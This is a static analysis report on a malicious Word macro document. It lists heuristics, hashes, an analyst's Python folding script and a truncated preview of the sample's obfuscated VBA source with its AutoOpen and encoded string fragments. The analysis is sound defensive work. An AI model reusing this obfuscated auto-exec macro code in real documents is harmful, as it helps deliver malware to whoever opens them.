Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e22d16931840e6ee…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 218.8 KB
Created: 2018-06-26 14:02:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: e1131b4665947406f210e8b5e4575833
SHA-1: 0b9af8c97e4aa39c0229db9878b0547bb7e5acb3
SHA-256: e22d16931840e6eee8e6c8e9bf3ec16ec7b39606b303f162aeed1c2281dce77e
Risk score: 182

Malware Insights

MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic)

The critical heuristic OLE_VBA_SHELL indicates that the VBA project contains a Shell() call, which starts an external process. The entry point is an AutoOpen macro (OLE_VBA_AUTOOPEN), which runs as soon as the document is opened with macros enabled; OLE_VBA_PCODE_AUTOEXEC_EXEC confirms that the compiled p-code stream also carries the auto-exec and execution tokens, so the behaviour is attested independently of the decompiled source. That source is heavily padded: every function interleaves filler statements (CDate(n), Sin(n), integer constants, and assignments from names that are not defined in the visible source, all silenced by On Error Resume Next) with string variables assembled from short literals, and then joins those variables into one value. The string 'g10@3z30q100z11i35!63C63!59@113X100g100!32}36}56C34z39!' is therefore not a reconstructed command or URL; it is one of the twelve fragments (NttZos) that vYjtJ() concatenates into its return value, and the joined result is still encoded, as runs of digits separated by filler characters (z, @, q, i, !, C, X, g, }, b). The decoding routine and the Shell() call that uses its output are not in the visible part of the preview, so no command line or download URL can be stated from this report. Nothing on the page supports a PowerShell stage: the only ATT&CK mapping is T1059.005 (Visual Basic), and the single extracted URL is the DrawingML schema namespace, which is Office boilerplate rather than an indicator. The OLE_LEGACY_WORDBASIC_AUTOEXEC finding describes a document with no recoverable VBA project, which does not match this sample (macros.bas was decoded), so treat it as a second hit on the AutoOpen marker rather than as independent WordBasic evidence.
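How the fragment-to-return-value relationship above is established, as an added worked example that is not part of this report or of the tooling that produced it: a small Python folder that walks the extracted macros.bas (see the preview under Extracted artifacts), skips the junk assignments, evaluates the literal and Chr() concatenations, and resolves each function's final concatenation to its return value. The input is a trimmed excerpt of the macro preview (three of the twelve fragments that vYjtJ() joins, plus a few of the filler lines), cut down so the example runs offline; the function and variable names are the sample's own. numeric_tokens() encodes an assumption the report does not make, namely that the letters and symbols between the digit runs are filler and the integers carry the payload; the real decoder is outside the visible preview, so the output is the encoded string, not a command.

```python
import re

# Trimmed excerpt of the macros.bas preview in this report: three of the twelve
# string fragments that vYjtJ() concatenates, plus a few of the junk statements
# (CDate/Sin/integer assignments, a reference to an undefined name) that pad
# the real code. Cut down here so the example runs stand-alone.
SAMPLE_VBA = '''
Function vYjtJ()
On Error Resume Next
zGpJV = CDate(38803)
BRZFj = 11945
jvvwDE = IwjHq
aKAoJ = "He" + "ll " + " " + Chr(40) + "'1" + "11z29@4" + "7C59!118" + "}37}46" + "g60g1" + "02" + "@36" + "q41i33"
mzfVaz = Sin(28227)
zDDnABfoU = "X4" + "6X40}" + "63!107" + "i5z46X" + "63q101!2" + "8i46g4" + "1@" + "8@39C34@" + "46z"
NttZos = "g10@3z30" + "q100z" + "11i3" + "5!63C" + "63!59@" + "113" + "X100g100" + "!32}" + "36}56" + "C3" + "4z39!"
vYjtJ = aKAoJ + zDDnABfoU + NttZos
End Function
'''

FUNC_START = re.compile(r'^\s*(?:Public\s+|Private\s+)?(?:Function|Sub)\s+(\w+)\s*\(', re.I)
FUNC_END = re.compile(r'^\s*End\s+(?:Function|Sub)\s*$', re.I)
ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$')
# Filler the sample uses between real statements: bare integers, CDate(n), Sin(n).
JUNK = re.compile(r'^\s*\w+\s*=\s*(?:\d+|CDate\(\d+\)|Sin\(\d+\))\s*$')
# Pieces of a concatenation we can fold: "literal", Chr(n), a name, + or &, anything else.
TOKEN = re.compile(r'"((?:[^"]|"")*)"|Chr\((\d+)\)|(\w+)|([+&])|(\S)')


def fold_expression(rhs, env):
    """Statically evaluate a VBA concatenation of string literals, Chr(n) calls
    and names already resolved in env. Returns (value, names_used); value is
    None when any piece is something we do not model (a call, an undefined name)."""
    parts, names = [], []
    for m in TOKEN.finditer(rhs):
        literal, chr_code, name, concat, other = m.groups()
        if literal is not None:
            parts.append(literal.replace('""', '"'))   # VBA doubles a quote to escape it
        elif chr_code is not None:
            parts.append(chr(int(chr_code)))
        elif name is not None:
            if name not in env:
                return None, names
            names.append(name)
            parts.append(env[name])
        elif concat is not None:
            continue
        else:
            return None, names
    return ''.join(parts), names


def fold_macro(src):
    """Walk each Function/Sub, skip junk lines, fold string assignments, and
    record the value assigned to the function's own name (its return value)."""
    results, func, env, stats = {}, None, {}, None
    for line in src.splitlines():
        start = FUNC_START.match(line)
        if start:
            func, env = start.group(1), {}
            stats = {'return': None, 'fragments': 0, 'junk_lines': 0, 'unresolved': 0}
            results[func] = stats
            continue
        if FUNC_END.match(line):
            func = None
            continue
        if func is None:
            continue
        if JUNK.match(line):
            stats['junk_lines'] += 1
            continue
        m = ASSIGN.match(line)
        if not m:
            continue
        target, rhs = m.groups()
        value, names = fold_expression(rhs, env)
        if value is None:
            stats['unresolved'] += 1
            continue
        env[target] = value
        if target == func:
            stats['return'] = value
            stats['fragments'] = len(names)
    return results


def numeric_tokens(s):
    """ASSUMPTION (not stated by the report): the letters and symbols between
    the digit runs are filler and the integers carry the payload. Returns the
    integer sequence so an analyst can test candidate decoders against it."""
    return [int(n) for n in re.findall(r'\d+', s)]


if __name__ == '__main__':
    info = fold_macro(SAMPLE_VBA)['vYjtJ']
    print('junk lines skipped:', info['junk_lines'], 'unresolved:', info['unresolved'])
    print('vYjtJ() returns:', info['return'])
    print('digit runs:', numeric_tokens(info['return'])[:12])
```

Run against the full macros.bas, the folder reports twelve fragments for vYjtJ() and shows that the string quoted in Malware Insights is the NttZos piece sitting in the middle of the joined value, still wrapped in the separator characters; whichever routine strips those and maps the numbers to characters is the next thing to locate in the truncated part of the source.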

Heuristics (6)

  • VBA macros detected [medium] OLE_VBA_MACROS (3 related findings)
    The document contains VBA macro code.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The VBA source contains a call to Shell(), which starts an external process.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    A macro named AutoOpen runs automatically when the document is opened with macros enabled.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This also catches documents whose macro source has been stripped or fails to extract, where only the p-code remains.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, with no modern VBA project recovered and no stronger macro-virus family marker present. This is analyst-facing evidence of the old Word macro execution surface; it does not by itself attribute a downloader or a parser CVE. For this sample the marker coincides with the VBA AutoOpen macro recovered in macros.bas, so treat it as a second hit on the same entry point.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL labels show which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, found in the document text (OLE body). This is the DrawingML schema namespace, standard Office boilerplate rather than an indicator.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8542 bytes
SHA-256: ed03f4c726ead7801787e52b01cdcda66d2ec6e08d0e445f2c147727e6c70fc0

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "CIalEmj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "lpwREiXDScO"
Function vYjtJ()
On Error Resume Next
zGpJV = CDate(38803)
BRZFj = 11945
fSvDPo = 7428
zKLjcC = 8228
VFzrIn = Sin(63268)
jvvwDE = IwjHq
aKAoJ = "He" + "ll " + " " + Chr(40) + "'1" + "11z29@4" + "7C59!118" + "}37}46" + "g60g1" + "02" + "@36" + "q41i33"
mzfVaz = Sin(28227)
aIwjrl = 45063
qrCkk = jRaBML
pXDwp = CDate(65503)
Jwuaf = 12142
kucXi = 42647
zDDnABfoU = "X4" + "6X40}" + "63!107" + "i5z46X" + "63q101!2" + "8i46g4" + "1@" + "8@39C34@" + "46z"
PmdzrG = Sin(98681)
WrkbMA = 17935
fwwRhs = KEiHi
cihOh = CDate(26579)
npiWd = 20947
ozKscc = 91072
lObzDkd = "37g63!11" + "2g111!" + "13C7X60" + "!118@10" + "8g3" + "5z63i63" + "g59!113C" + "100i100C" + "60X60@60" + "z101z" + "42z61" + "b46z3"
ATZtq = Sin(80961)
RBHnUX = 35628
Qbmhs = QvDiL
MYFZG = CDate(33884)
tflcw = 76483
RhDERG = 49412
FQffTi = "8C4" + "6X42" + "i47q36g" + "60" + "q5" + "6i101C" + "40C" + "36g" + "38C100@" + "44g4" + "1@27"
wojiv = 32296
HbDqz = CDate(5993)
mdjVT = 64639
ZPjtn = XlpJj
iPcdo = 40194
wGBFG = Sin(58658)
NttZos = "g10@3z30" + "q100z" + "11i3" + "5!63C" + "63!59@" + "113" + "X100g100" + "!32}" + "36}56" + "C3" + "4z39!"
nYnoRf = 97777
BNGPUf = CDate(72519)
zbivq = 3063
wKzsAP = cpjodm
RkjDE = 97726
AnFPS = Sin(48)
DEpAvVQM = "39" + "}36}59!4" + "6i5" + "7q62g" + "63q" + "36" + "@62C57i5" + "6i101q4"
zpdvC = 3404
MKrKp = CDate(19411)
BWQDj = 82996
slCHIl = DijmP
tjNUUU = 66003
SBbSVB = Sin(90460)
ZuLjoznHVh = "0}36X3" + "8g100g" + "38b57C" + "46" + "g59C114!" + "42q" + "3}58b10" + "0}11q3" + "5@63}63" + "b5"
KdKsM = 49569
sHNZz = CDate(46768)
fiQwd = 35337
vjLIc = vYLGjZ
hITtnw = 29396
vfFYT = Sin(19493)
oWXromHopGn = "9q113z10" + "0i100i6" + "0q60" + "q60X1" + "01}4" + "0z62i56@"
fNwqO = 21645
sQDTmG = CDate(93781)
wkbQZp = 44195
XJfDG = FBQPVl
jBLFac = 31034
icnknj = Sin(15949)
VJPGu = "63b3" + "6q38X42" + "}40" + "@40" + "!46z56q" + "56" + "!47" + "z4" + "2}63q" + "42@41q" + "42b5" + "6X46q10"
XIdGjE = 38796
jiRAM = CDate(8899)
imKSj = 30018
wNGCr = jMsaMS
clwwXE = 35903
DsJTR = Sin(77387)
ShJlrEHZp = "1b40b36" + "}38q1" + "00q33" + "i3" + "6C34" + "b6" + "2X46X35" + "X63g57!" + "100g" + "114q" + "44b1"
RSGDG = 70132
qwiWw = CDate(24125)
sZnIh = 86453
NuiwVb = dvHrM
ohDzW = 77381
PESaW = Sin(52342)
LYwYXwtwjoY = "14z1" + "27X59z1" + "21q100" + "@1" + "1b3" + "5C63}"
zjZcZb = 95627
idndz = CDate(85792)
DiJJz = 93445
KVomt = Wunaqk
pZdhU = 71787
kzuGn = Sin(83076)
SzGaHLEEEph = "63z" + "59" + "b113g" + "100!10" + "0!60" + "C60" + "g60q" + "101C47g" + "46}34b" + "38" + "i59z3"
vYjtJ = aKAoJ + zDDnABfoU + lObzDkd + FQffTi + NttZos + DEpAvVQM + ZuLjoznHVh + oWXromHopGn + VJPGu + ShJlrEHZp + LYwYXwtwjoY + SzGaHLEEEph
ztrozB = 47680
FsjTd = CDate(73457)
KDfLzb = 57866
boODX = wMNRjI
pjjwX = 70417
wNiVk = Sin(59856)
End Function
Function vChQQ()
On Error Resume Next
TarNEH = 8518
wEizZ = CDate(77332)
aMRkm = 40505
wPZrn = izaEW
aPznK = 45354
SfWPPD = Sin(97236)
wLqjzusAdJV = "9g42" + "!37z6" + "3g101g" + "40q" + "36@38X10" + "0C" + "8g13b56" + "q13g" + "114}25" + "q30q100" + "@11g3"
BjfaF = 60080
GQCICC = CDate(90630)
SfzaL = 4711
YGMHBw = CVkjY
SDoGw = 53699
YhGjs = Sin(60034)
JTPutrHUIq = "5z63" + "z63!59i" + "113}10" + "0!100i" + "37X45g62" + "z56}" + "46b47q34" + "i44X3"
wwZTFA = 72310
IrSQp = CDate(31280)
iuOBZo = 28770
qbjnZp = mBWdjU
DqsXM = 75139
EGiJp = Sin(31042)
PSYlzwzVmP = "4i" + "63@42!39" + "g101}40X" + "36g101" + "C49" + "i42i10" + "0g14C8!" + "41b"
hBEvzV = 84584
EBhkYZ = CDate(97610)
fZObT = 82737
IBcbF = iKTUop
zQwWf = 97906
AFdhu = Sin(78186)
LEajMmw = "40b45" + "g15g" + "51" + "g58" + "q100g1" + "08z101q2" + "4z5" + "9i39" + "!34}63X" + "99z108" + "!11"
ovaYid = 12468
NCwnHU = CDate(6707)
wcAqJ =
... (truncated)